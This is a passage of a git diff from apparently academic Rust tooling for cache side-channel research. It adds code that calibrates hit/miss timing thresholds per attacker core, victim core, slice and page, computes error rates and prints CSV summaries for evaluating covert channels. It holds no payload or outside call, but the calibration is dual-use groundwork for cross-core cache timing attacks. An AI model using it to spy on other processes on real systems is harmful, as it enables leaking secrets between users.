+ //let av_best_av_errors
+    let av_best_a_errors: HashMap<usize, (ErrorPrediction, HashMap<SVP, ThresholdError>)> =
+ accumulate(
+ av_detailed_errors.clone(),
+ |asvp: ASVP| asvp.attacker,
+ || (ErrorPrediction::default(), HashMap::new()),
+            |acc: &mut (ErrorPrediction, HashMap<SVP, ThresholdError>),
+ threshold_error,
+ asvp: ASVP,
+ attacker| {
+ assert_eq!(attacker, asvp.attacker);
+ let svp = SVP {
+ slice: asvp.slice,
+ page: asvp.page,
+ victim: asvp.victim,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(svp, threshold_error);
+ },
+ );
+
+ // Find best index in each model...
+
+ // CSV output logic
+
+ /* moving parts :
+ - order of lines
+ - columns and columns header.
+ - Probably should be a macro ?
+ Or something taking a Vec of Column and getter, plus a vec (or iterator) of 'Keys'
+ */
+
+    let mut keys = asvp_threshold_errors.keys().collect::<Vec<&ASVP>>();
+ keys.sort_unstable_by(|a: &&ASVP, b: &&ASVP| {
+ if a.page > b.page {
+ Ordering::Greater
+ } else if a.page < b.page {
+ Ordering::Less
+ } else if a.slice > b.slice {
+ Ordering::Greater
+ } else if a.slice < b.slice {
+ Ordering::Less
+ } else if a.attacker > b.attacker {
+ Ordering::Greater
+ } else if a.attacker < b.attacker {
+ Ordering::Less
+ } else if a.victim > b.victim {
+ Ordering::Greater
+ } else if a.victim < b.victim {
+ Ordering::Less
+ } else {
+ Ordering::Equal
}
- eprintln!("Thresholds :\n{:#?}", thresholds);
- println!("Thresholds :\n{:#?}", thresholds);
+ });
+
+ // In theory there should be a way of making such code much more modular.
+
+ let error_header = |name: &str| {
+ format!(
+ "{}ErrorRate,{}Errors,{}Measures,{}TrueHit,{}TrueMiss,{}FalseHit,{}FalseMiss",
+ name, name, name, name, name, name, name
+ )
+ };
+
+ let header = |name: &str| {
+ format!(
+ "{}_Threshold,{}_MFH,{}_GlobalErrorRate,{}",
+ name,
+ name,
+ name,
+ error_header(&format!("{}_ASVP", name))
+ )
+ };
+
+ println!(
+ "Analysis:Page,Slice,Attacker,Victim,ASVP_Threshold,ASVP_MFH,{},{},{},{},{}",
+ error_header("ASVP_"),
+ header("ASP"),
+ header("SP"),
+ header("AV"),
+ header("GT")
+ );
+
+ let format_error = |error_pred: &ErrorPrediction| {
+ format!(
+ "{},{},{},{},{},{},{}",
+ error_pred.error_rate(),
+ error_pred.total_error(),
+ error_pred.total(),
+ error_pred.true_hit,
+ error_pred.true_miss,
+ error_pred.false_hit,
+ error_pred.false_miss
+ )
+ };
+
+ let format_detailed_model = |global: &ThresholdError, detailed: &ThresholdError| {
+ assert_eq!(global.threshold, detailed.threshold);
+ format!(
+ "{},{},{},{}",
+ global.threshold.bucket_index,
+ global.threshold.miss_faster_than_hit,
+ global.error.error_rate(),
+ format_error(&detailed.error)
+ )
+ };
+
+ for key in keys {
+ print!(
+ "Analysis:{},{},{},{},",
+ key.page, key.slice, key.attacker, key.victim
+ );
+ let threshold_error = asvp_threshold_errors[key];
+ print!(
+ "{},{},{},",
+ threshold_error.threshold.bucket_index,
+ threshold_error.threshold.miss_faster_than_hit,
+ format_error(&threshold_error.error)
+ );
+
+ let asp_global = &asp_threshold_errors[&ASP {
+ attacker: key.attacker,
+ slice: key.slice,
+ page: key.page,
+ }];
+ let asp_detailed = &asp_detailed_errors[key];
+ print!("{},", format_detailed_model(asp_global, asp_detailed));
+
+ let sp_global = &sp_threshold_errors[&SP {
+ slice: key.slice,
+ page: key.page,
+ }];
+ let sp_detailed = &sp_detailed_errors[key];
+ print!("{},", format_detailed_model(sp_global, sp_detailed));
+
+ let av_global = &av_threshold_errors[&AV {
+ attacker: key.attacker,
+ victim: key.victim,
+ }];
+ let av_detailed = &av_detailed_errors[key];
+ print!("{},", format_detailed_model(av_global, av_detailed));
+
+        let gt_global = &gt_threshold_error;
+        let gt_detailed = &gt_detailed_errors[key];
+ print!("{},", format_detailed_model(gt_global, gt_detailed));
+ println!();
}
+
+    // The two other CSVs are summaries that allow determining the best case; index into the first CSV for the detailed info.
+ // Second CSV output logic:
+
+ // Build keys
+    let mut keys = asvp_best_av_errors.keys().collect::<Vec<&AV>>();
+ keys.sort_unstable_by(|a: &&AV, b: &&AV| {
+ if a.attacker > b.attacker {
+ Ordering::Greater
+ } else if a.attacker < b.attacker {
+ Ordering::Less
+ } else if a.victim > b.victim {
+ Ordering::Greater
+ } else if a.victim < b.victim {
+ Ordering::Less
+ } else {
+ Ordering::Equal
+ }
+ });
+
+ // Print header
+ println!(
+ "AVAnalysis:Attacker,Victim,{},{}",
+ error_header("AVSP_Best_AV_"),
+ error_header("AV_Best_AV_")
+ );
+ //print lines
+
+ for av in keys {
+ println!(
+ "AVAnalysis:{attacker},{victim},{AVSP},{AV}",
+ attacker = av.attacker,
+ victim = av.victim,
+ AVSP = format_error(&asvp_best_av_errors[av].0),
+ AV = format_error(&av_threshold_errors[av].error),
+ );
+ }
+
+ // Third CSV output logic:
+
+ // Build keys
+    let mut keys = asvp_best_a_errors.keys().collect::<Vec<&usize>>();
+ keys.sort_unstable();
+
+ println!(
+ "AttackerAnalysis:Attacker,{},{},{}",
+ error_header("AVSP_Best_A_"),
+ error_header("ASP_Best_A_"),
+ error_header("AV_Best_A_"),
+ );
+
+ for attacker in keys {
+ println!(
+ "AttackerAnalysis:{attacker},{AVSP},{ASP},{AV}",
+ attacker = attacker,
+ AVSP = format_error(&asvp_best_a_errors[&attacker].0),
+ ASP = format_error(&asp_best_a_errors[&attacker].0),
+            AV = format_error(&av_best_a_errors[&attacker].0)
+ );
+ }
+
+ /*
+ println!(
+ "analysis result: {:?}",
+        asvp_threshold_errors.keys().copied().collect::<Vec<ASVP>>()
+ );
+ println!("Global Analysis: {:#?}", global_threshold_errors);
+ println!(
+ "Global thrshold total error rate :{}",
+ global_threshold_errors.error.error_rate()
+ );*/
}
diff --git a/cache_utils/src/calibration.rs b/cache_utils/src/calibration.rs
index 9e4219c..99c52a9 100644
--- a/cache_utils/src/calibration.rs
+++ b/cache_utils/src/calibration.rs
@@ -34,6 +34,12 @@ use core::sync::atomic::{spin_loop_hint, AtomicBool, AtomicPtr, Ordering};
use itertools::Itertools;
use atomic::Atomic;
+use core::hash::Hash;
+use core::ops::{Add, AddAssign};
+#[cfg(feature = "no_std")]
+use hashbrown::HashMap;
+#[cfg(feature = "use_std")]
+use std::collections::HashMap;
#[derive(Ord, PartialOrd, Eq, PartialEq)]
pub enum Verbosity {
@@ -106,6 +112,12 @@ pub unsafe fn l3_and_reload(p: *const u8) -> u64 {
only_reload(p)
}
+pub const PAGE_LEN: usize = 1 << 12;
+
+pub fn get_vpn<T>(p: *const T) -> usize {
+ (p as usize) & (!(PAGE_LEN - 1)) // FIXME
+}
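+
+// Example: with 4 KiB pages, addresses within one page share a VPN
+// (illustrative addresses).
+// assert_eq!(get_vpn(0x5678 as *const u8), 0x5000);
+// assert_eq!(get_vpn(0x5fff as *const u8), 0x5000);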
+
const BUCKET_SIZE: usize = 5;
const BUCKET_NUMBER: usize = 250;
@@ -918,3 +930,764 @@ pub fn calibrate_L3_miss_hit(
r.into_iter().next().unwrap()
}
+
+/*
+ ASVP trait ?
+ Easily put any combination, use None to signal Any possible value, Some to signal fixed value.
+*/
+
+pub type VPN = usize;
+pub type Slice = u8;
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct ASVP {
+ pub attacker: usize,
+ pub slice: Slice,
+ pub victim: usize,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct CSP {
+ pub core: usize,
+ pub slice: Slice,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct ASP {
+ pub attacker: usize,
+ pub slice: Slice,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct SVP {
+ pub slice: Slice,
+ pub victim: usize,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct SP {
+ pub slice: Slice,
+ pub page: VPN,
+}
+
+#[derive(PartialEq, Eq, Debug, Hash, Clone, Copy, Default)]
+pub struct AV {
+ pub attacker: usize,
+ pub victim: usize,
+}
+
+#[derive(Debug, Clone)]
+pub struct RawHistogram {
+ pub hit: Vec<u32>,
+ pub miss: Vec<u32>,
+}
+
+// All histograms deal in buckets: FIXME we should clearly distinguish bucket vs time.
+// Thresholds are less than equal.
+impl RawHistogram {
+ pub fn from(
+ mut calibrate_result: CalibrateResult,
+ hit_index: usize,
+ miss_index: usize,
+ ) -> Self {
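+ // push() + swap_remove() extracts each vector at its index in O(1),
+ // leaving an empty placeholder so the second index remains valid.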
+ calibrate_result.histogram.push(Vec::default());
+ let hit = calibrate_result.histogram.swap_remove(hit_index);
+ calibrate_result.histogram.push(Vec::default());
+ let miss = calibrate_result.histogram.swap_remove(miss_index);
+ RawHistogram { hit, miss }
+ }
+
+ pub fn empty(len: usize) -> Self {
+ Self {
+ hit: vec![0; len],
+ miss: vec![0; len],
+ }
+ }
+}
+
+// Addition logic
+
+// Tough case, both references.
+
+impl Add for &RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(self, rhs: &RawHistogram) -> Self::Output {
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.miss.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), self.miss.len());
+ let len = self.hit.len();
+ let mut r = RawHistogram {
+ hit: vec![0; len],
+ miss: vec![0; len],
+ };
+ for i in 0..len {
+ r.hit[i] = self.hit[i] + rhs.hit[i];
+ r.miss[i] = self.miss[i] + rhs.miss[i];
+ }
+ r
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&RawHistogram> for RawHistogram {
+ //type Rhs = &RawHistogram;
+ fn add_assign(&mut self, rhs: &Self) {
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.miss.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), self.miss.len());
+
+ for i in 0..self.hit.len() {
+ self.hit[i] += rhs.hit[i];
+ self.miss[i] += rhs.miss[i];
+ }
+ }
+}
+
+// Fallback to most common case
+
+impl Add for RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<RawHistogram> for &RawHistogram {
+ type Output = RawHistogram;
+
+ fn add(self, mut rhs: RawHistogram) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for RawHistogram {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+pub fn cum_sum(vector: &[u32]) -> Vec<u32> {
+ let len = vector.len();
+ let mut res = vec![0; len];
+ res[0] = vector[0];
+ for i in 1..len {
+ res[i] = res[i - 1] + vector[i];
+ }
+ assert_eq!(len, res.len());
+ assert_eq!(len, vector.len());
+ res
+}
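+
+// Example: prefix sums turn "how many samples at or below bucket i" into an
+// O(1) lookup (illustrative values).
+// assert_eq!(cum_sum(&[1, 2, 3, 0]), vec![1, 3, 6, 6]);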
+
+#[derive(Debug, Clone)]
+pub struct HistogramCumSum {
+ pub num_hit: u32,
+ pub num_miss: u32,
+ pub hit: Vec<u32>,
+ pub miss: Vec<u32>,
+ pub hit_cum_sum: Vec<u32>,
+ pub miss_cum_sum: Vec<u32>,
+}
+
+impl HistogramCumSum {
+ pub fn from(raw_histogram: RawHistogram) -> Self {
+ let len = raw_histogram.miss.len();
+
+ assert_eq!(raw_histogram.hit.len(), len);
+
+ // Cum Sums
+ let miss_cum_sum = cum_sum(&raw_histogram.miss);
+ let hit_cum_sum = cum_sum(&raw_histogram.hit);
+ let miss_total = miss_cum_sum[len - 1];
+ let hit_total = hit_cum_sum[len - 1];
+ Self {
+ num_hit: hit_total,
+ num_miss: miss_total,
+ hit: raw_histogram.hit,
+ miss: raw_histogram.miss,
+ hit_cum_sum,
+ miss_cum_sum,
+ }
+ }
+
+ pub fn from_calibrate(
+ calibrate_result: CalibrateResult,
+ hit_index: usize,
+ miss_index: usize,
+ ) -> Self {
+ Self::from(RawHistogram::from(calibrate_result, hit_index, miss_index))
+ }
+
+ pub fn error_for_threshold(&self, threshold: Threshold) -> ErrorPrediction {
+ if threshold.miss_faster_than_hit {
+ ErrorPrediction {
+ true_hit: self.num_hit - self.hit_cum_sum[threshold.bucket_index],
+ true_miss: self.miss_cum_sum[threshold.bucket_index],
+ false_hit: self.num_miss - self.miss_cum_sum[threshold.bucket_index],
+ false_miss: self.hit_cum_sum[threshold.bucket_index],
+ }
+ } else {
+ ErrorPrediction {
+ true_hit: self.hit_cum_sum[threshold.bucket_index],
+ true_miss: self.num_miss - self.miss_cum_sum[threshold.bucket_index],
+ false_hit: self.miss_cum_sum[threshold.bucket_index],
+ false_miss: self.num_hit - self.hit_cum_sum[threshold.bucket_index],
+ }
+ }
+ }
+
+ pub fn len(&self) -> usize {
+ self.hit.len()
+ }
+
+ pub fn empty(len: usize) -> Self {
+ Self {
+ num_hit: 0,
+ num_miss: 0,
+ hit: vec![0; len],
+ miss: vec![0; len],
+ hit_cum_sum: vec![0; len],
+ miss_cum_sum: vec![0; len],
+ }
+ }
+}
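+
+// Example: with miss_faster_than_hit, every miss sample at or below the
+// threshold bucket is a true miss and every hit sample there is a false miss;
+// the counts fall out of the cumulative sums (illustrative numbers).
+// let h = HistogramCumSum::from(RawHistogram { hit: vec![0, 1, 9], miss: vec![8, 2, 0] });
+// let pred = h.error_for_threshold(Threshold { bucket_index: 1, miss_faster_than_hit: true });
+// assert_eq!(pred.true_miss, 10); // miss_cum_sum[1]
+// assert_eq!(pred.false_miss, 1); // hit_cum_sum[1]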
+
+// Addition logic
+
+// Tough case, both references.
+
+impl Add for &HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(self, rhs: &HistogramCumSum) -> Self::Output {
+ assert_eq!(self.hit.len(), self.miss.len());
+ assert_eq!(self.hit.len(), self.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), self.miss_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.hit.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), rhs.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.miss_cum_sum.len());
+ let len = self.len();
+ let mut r = HistogramCumSum {
+ num_hit: self.num_hit + rhs.num_hit,
+ num_miss: self.num_miss + rhs.num_miss,
+ hit: vec![0; len],
+ miss: vec![0; len],
+ hit_cum_sum: vec![0; len],
+ miss_cum_sum: vec![0; len],
+ };
+ for i in 0..len {
+ r.hit[i] = self.hit[i] + rhs.hit[i];
+ r.miss[i] = self.miss[i] + rhs.miss[i];
+ r.hit_cum_sum[i] = self.hit_cum_sum[i] + rhs.hit_cum_sum[i];
+ r.miss_cum_sum[i] = self.miss_cum_sum[i] + rhs.miss_cum_sum[i];
+ }
+ r
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&Self> for HistogramCumSum {
+ fn add_assign(&mut self, rhs: &Self) {
+ assert_eq!(self.hit.len(), self.miss.len());
+ assert_eq!(self.hit.len(), self.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), self.miss_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.hit.len());
+ assert_eq!(self.hit.len(), rhs.miss.len());
+ assert_eq!(self.hit.len(), rhs.hit_cum_sum.len());
+ assert_eq!(self.hit.len(), rhs.miss_cum_sum.len());
+ self.num_hit += rhs.num_hit;
+ self.num_miss += rhs.num_miss;
+ let len = self.len();
+ for i in 0..len {
+ self.hit[i] += rhs.hit[i];
+ self.miss[i] += rhs.miss[i];
+ self.hit_cum_sum[i] += rhs.hit_cum_sum[i];
+ self.miss_cum_sum[i] += rhs.miss_cum_sum[i];
+ }
+ }
+}
+
+// Fallback to most common case
+
+impl Add for HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<HistogramCumSum> for &HistogramCumSum {
+ type Output = HistogramCumSum;
+
+ fn add(self, mut rhs: HistogramCumSum) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for HistogramCumSum {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+#[derive(Debug, Clone, Copy, Default)]
+pub struct ErrorPrediction {
+ pub true_hit: u32,
+ pub true_miss: u32,
+ pub false_hit: u32,
+ pub false_miss: u32,
+}
+
+impl ErrorPrediction {
+ pub fn total_error(&self) -> u32 {
+ self.false_hit + self.false_miss
+ }
+ pub fn total(&self) -> u32 {
+ self.false_hit + self.false_miss + self.true_hit + self.true_miss
+ }
+ pub fn error_rate(&self) -> f32 {
+ (self.false_miss + self.false_hit) as f32 / (self.total() as f32)
+ }
+}
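+
+// Example: 90 correct and 10 incorrect classifications give a 10% error rate
+// (illustrative counts).
+// let p = ErrorPrediction { true_hit: 45, true_miss: 45, false_hit: 4, false_miss: 6 };
+// assert_eq!(p.total(), 100);
+// assert_eq!(p.total_error(), 10);
+// assert_eq!(p.error_rate(), 0.1);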
+
+impl Add for &ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(self, rhs: &ErrorPrediction) -> Self::Output {
+ ErrorPrediction {
+ true_hit: self.true_hit + rhs.true_hit,
+ true_miss: self.true_miss + rhs.true_miss,
+ false_hit: self.false_hit + rhs.false_hit,
+ false_miss: self.false_miss + rhs.false_miss,
+ }
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&Self> for ErrorPrediction {
+ fn add_assign(&mut self, rhs: &Self) {
+ self.true_hit += rhs.true_hit;
+ self.true_miss += rhs.true_miss;
+ self.false_hit += rhs.false_hit;
+ self.false_miss += rhs.false_miss;
+ }
+}
+
+// Fallback to most common case
+
+impl Add for ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<ErrorPrediction> for &ErrorPrediction {
+ type Output = ErrorPrediction;
+
+ fn add(self, mut rhs: ErrorPrediction) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for ErrorPrediction {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+#[derive(Debug, Clone)]
+pub struct ErrorPredictions {
+ pub histogram: HistogramCumSum,
+ pub error_miss_less_than_hit: Vec<u32>,
+ pub error_hit_less_than_miss: Vec<u32>,
+}
+
+impl ErrorPredictions {
+ // BUGGY TODO
+ pub fn predict_errors(hist: HistogramCumSum) -> Self {
+ let mut error_miss_less_than_hit = vec![0; hist.len() - 1];
+ let mut error_hit_less_than_miss = vec![0; hist.len() - 1];
+ for threshold_bucket_index in 0..(hist.len() - 1) {
+ error_miss_less_than_hit[threshold_bucket_index] = hist
+ .error_for_threshold(Threshold {
+ bucket_index: threshold_bucket_index,
+ miss_faster_than_hit: true,
+ })
+ .total_error();
+
+ error_hit_less_than_miss[threshold_bucket_index] = hist
+ .error_for_threshold(Threshold {
+ bucket_index: threshold_bucket_index,
+ miss_faster_than_hit: false,
+ })
+ .total_error();
+ }
+ Self {
+ histogram: hist,
+ error_miss_less_than_hit,
+ error_hit_less_than_miss,
+ }
+ }
+
+ pub fn empty(len: usize) -> Self {
+ Self::predict_errors(HistogramCumSum::empty(len))
+ }
+
+ pub fn debug(&self) {
+ println!("Debug:HEADER TBD");
+ for i in 0..(self.histogram.len() - 1) {
+ println!(
+ "Debug:{:5},{:5},{:6},{:6},{:6}, {:6}",
+ self.histogram.hit[i],
+ self.histogram.miss[i],
+ self.histogram.hit_cum_sum[i],
+ self.histogram.miss_cum_sum[i],
+ self.error_miss_less_than_hit[i],
+ self.error_hit_less_than_miss[i]
+ );
+ }
+ let i = self.histogram.len() - 1;
+ println!(
+ "Debug:{:5},{:5},{:6},{:6}",
+ self.histogram.hit[i],
+ self.histogram.miss[i],
+ self.histogram.hit_cum_sum[i],
+ self.histogram.miss_cum_sum[i]
+ );
+ }
+}
+
+// Addition logic
+
+// Tough case, both references.
+
+impl Add for &ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(self, rhs: &ErrorPredictions) -> Self::Output {
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ rhs.error_hit_less_than_miss.len()
+ );
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ self.error_miss_less_than_hit.len()
+ );
+ assert_eq!(
+ self.error_miss_less_than_hit.len(),
+ rhs.error_miss_less_than_hit.len()
+ );
+ let len = self.error_miss_less_than_hit.len();
+ let mut r = ErrorPredictions {
+ histogram: &self.histogram + &rhs.histogram,
+ error_miss_less_than_hit: vec![0; len],
+ error_hit_less_than_miss: vec![0; len],
+ };
+ for i in 0..len {
+ r.error_miss_less_than_hit[i] =
+ self.error_miss_less_than_hit[i] + rhs.error_miss_less_than_hit[i];
+ r.error_hit_less_than_miss[i] =
+ self.error_hit_less_than_miss[i] + rhs.error_hit_less_than_miss[i];
+ }
+ r
+ }
+}
+
+// most common case re-use of self is possible. (Or a reduction to such a case)
+
+impl AddAssign<&Self> for ErrorPredictions {
+ fn add_assign(&mut self, rhs: &Self) {
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ rhs.error_hit_less_than_miss.len()
+ );
+ assert_eq!(
+ self.error_hit_less_than_miss.len(),
+ self.error_miss_less_than_hit.len()
+ );
+ assert_eq!(
+ self.error_miss_less_than_hit.len(),
+ rhs.error_miss_less_than_hit.len()
+ );
+ self.histogram += &rhs.histogram;
+ for i in 0..self.error_hit_less_than_miss.len() {
+ self.error_hit_less_than_miss[i] += rhs.error_hit_less_than_miss[i];
+ self.error_miss_less_than_hit[i] += rhs.error_miss_less_than_hit[i];
+ }
+ }
+}
+
+// Fallback to most common case
+
+impl Add for ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(mut self, rhs: Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<&Self> for ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(mut self, rhs: &Self) -> Self::Output {
+ self += rhs;
+ self
+ }
+}
+
+impl Add<ErrorPredictions> for &ErrorPredictions {
+ type Output = ErrorPredictions;
+
+ fn add(self, mut rhs: ErrorPredictions) -> Self::Output {
+ rhs += self;
+ rhs
+ }
+}
+
+impl AddAssign for ErrorPredictions {
+ fn add_assign(&mut self, rhs: Self) {
+ *self += &rhs;
+ }
+}
+
+#[derive(Debug, Clone, Copy, Default)]
+pub struct ThresholdError {
+ pub threshold: Threshold,
+ pub error: ErrorPrediction,
+}
+
+#[derive(Debug, Clone)]
+pub struct PotentialThresholds {
+ pub threshold_errors: Vec<ThresholdError>,
+}
+
+impl PotentialThresholds {
+ pub fn median(mut self) -> Option<ThresholdError> {
+ if self.threshold_errors.len() > 0 {
+ let index = (self.threshold_errors.len() - 1) / 2;
+ self.threshold_errors.push(Default::default());
+ Some(self.threshold_errors.swap_remove(index))
+ } else {
+ None
+ }
+ }
+
+ pub fn minimizing_total_error(error_pred: ErrorPredictions) -> Self {
+ let mut min_error = u32::max_value();
+ let mut threshold_errors = Vec::new();
+ for i in 0..error_pred.error_miss_less_than_hit.len() {
+ if error_pred.error_miss_less_than_hit[i] < min_error {
+ min_error = error_pred.error_miss_less_than_hit[i];
+ threshold_errors = Vec::new();
+ }
+ if error_pred.error_hit_less_than_miss[i] < min_error {
+ min_error = error_pred.error_hit_less_than_miss[i];
+ threshold_errors = Vec::new();
+ }
+ if error_pred.error_miss_less_than_hit[i] == min_error {
+ let threshold = Threshold {
+ bucket_index: i,
+ miss_faster_than_hit: true,
+ };
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ threshold_errors.push(ThresholdError { threshold, error })
+ }
+ if error_pred.error_hit_less_than_miss[i] == min_error {
+ let threshold = Threshold {
+ bucket_index: i,
+ miss_faster_than_hit: false,
+ };
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ threshold_errors.push(ThresholdError { threshold, error })
+ }
+ }
+ Self { threshold_errors }
+ }
+}
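+
+// Example selection flow (sketch; `predictions` is a hypothetical
+// ErrorPredictions): keep every threshold tied for minimal total error,
+// then pick the median candidate as a robust representative.
+// let best = PotentialThresholds::minimizing_total_error(predictions)
+// .median()
+// .expect("at least one candidate threshold");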
+
+// Thresholds are less than equal.
+// usize for bucket, u64 for time.
+#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)]
+pub struct Threshold {
+ pub bucket_index: usize,
+ pub miss_faster_than_hit: bool,
+}
+
+impl Threshold {
+ // FIXME !!!!
+ fn to_time(&self, bucket: usize) -> u64 {
+ bucket as u64
+ }
+
+ pub fn is_hit(&self, time: u64) -> bool {
+ self.miss_faster_than_hit && time >= self.to_time(self.bucket_index)
+ || !self.miss_faster_than_hit && time < self.to_time(self.bucket_index)
+ }
+}
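+
+// Example: with miss_faster_than_hit, timings at or above the threshold
+// bucket classify as hits (illustrative values; the bucket-to-time conversion
+// is still the identity, per the FIXME above).
+// let t = Threshold { bucket_index: 200, miss_faster_than_hit: true };
+// assert!(t.is_hit(250));
+// assert!(!t.is_hit(150));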
+
+pub fn calibration_result_to_ASVP<T, Analysis: Fn(CalibrateResult) -> T>(
+ results: Vec<CalibrateResult2T>,
+ base: *const u8,
+ analysis: Analysis,
+ slicing: &impl Fn(usize) -> u8,
+) -> Result<HashMap<ASVP, T>, nix::Error> {
+ let mut analysis_result: HashMap<ASVP, T> = HashMap::new();
+ for calibrate_2t_result in results {
+ let attacker = calibrate_2t_result.main_core;
+ let victim = calibrate_2t_result.helper_core;
+ match calibrate_2t_result.res {
+ Err(e) => return Err(e),
+ Ok(calibrate_1t_results) => {
+ for result_1t in calibrate_1t_results {
+ let offset = result_1t.offset;
+ let addr = unsafe { base.offset(offset) };
+ let page = get_vpn(addr); //TODO
+ let slice = slicing(addr as usize);
+ let analysed = analysis(result_1t);
+ let asvp = ASVP {
+ attacker,
+ slice,
+ victim,
+ page,
+ };
+ analysis_result.insert(asvp, analysed);
+ }
+ }
+ }
+ }
+ Ok(analysis_result)
+}
+
+pub fn map_values<K, U, V, F>(input: HashMap<K, U>, f: F) -> HashMap<K, V>
+where
+ K: Hash + Eq,
+ F: Fn(U, &K) -> V,
+{
+ let mut results = HashMap::new();
+ for (k, u) in input {
+ let f_u = f(u, &k);
+ results.insert(k, f_u);
+ }
+ results
+}
+
+pub fn accumulate<K, V, RK, Accumulator, Reduction, AccumulatorDefault, Accumulation>(
+ input: HashMap<K, V>,
+ reduction: Reduction,
+ accumulator_default: AccumulatorDefault,
+ aggregation: Accumulation,
+) -> HashMap<RK, Accumulator>
+where
+ K: Hash + Eq + Copy,
+ RK: Hash + Eq + Copy,
+ Reduction: Fn(K) -> RK,
+ Accumulation: Fn(&mut Accumulator, V, K, RK) -> (),
+ AccumulatorDefault: Fn() -> Accumulator,
+{
+ let mut accumulators = HashMap::new();
+ for (k, v) in input {
+ let rk = reduction(k);
+ aggregation(
+ accumulators
+ .entry(rk)
+ .or_insert_with(|| accumulator_default()),
+ v,
+ k,
+ rk,
+ );
+ }
+ accumulators
+}
+
+pub fn reduce<K, V, RK, RV, Accumulator, Reduction, AccumulatorDefault, Accumulation, Extract>(
+ input: HashMap<K, V>,
+ reduction: Reduction,
+ accumulator_default: AccumulatorDefault,
+ aggregation: Accumulation,
+ extraction: Extract,
+) -> HashMap<RK, RV>
+where
+ K: Hash + Eq + Copy,
+ RK: Hash + Eq + Copy,
+ Reduction: Fn(K) -> RK,
+ AccumulatorDefault: Fn() -> Accumulator,
+ Accumulation: Fn(&mut Accumulator, V, K, RK) -> (),
+ Extract: Fn(Accumulator, &RK) -> RV,
+{
+ let accumulators = accumulate(input, reduction, accumulator_default, aggregation);
+ let result = map_values(accumulators, extraction);
+ result
+}
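+
+// Example: collapsing per-(attacker, slice, victim, page) error predictions
+// into per-(attacker, victim) totals (sketch; `asvp_errors` is a hypothetical
+// HashMap<ASVP, ErrorPrediction>).
+// let av_errors: HashMap<AV, ErrorPrediction> = reduce(
+// asvp_errors,
+// |k| AV { attacker: k.attacker, victim: k.victim },
+// ErrorPrediction::default,
+// |acc, v, _k, _rk| *acc += &v,
+// |acc, _rk| acc,
+// );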
+
+/*
+pub fn compute_threshold_error() -> (Threshold, ()) {
+ unimplemented!();
+} // TODO
+*/
+
+#[cfg(test)]
+mod tests {
+
+ use crate::calibration::map_values;
+ #[cfg(feature = "no_std")]
+ use hashbrown::HashMap;
+ #[cfg(feature = "use_std")]
+ use std::collections::HashMap;
+
+ #[test]
+ fn test_map_values() {
+ let mut input = HashMap::new();
+ input.insert(0, "a");
+ input.insert(1, "b");
+ let output = map_values(input, |c, _k| c.to_uppercase());
+ assert_eq!(output[&0], "A");
+ assert_eq!(output[&1], "B");
+ }
+}
diff --git a/covert_channels_evaluation/.cargo/config b/covert_channels_evaluation/.cargo/config
new file mode 100644
index 0000000..2f05654
--- /dev/null
+++ b/covert_channels_evaluation/.cargo/config
@@ -0,0 +1,2 @@
+[build]
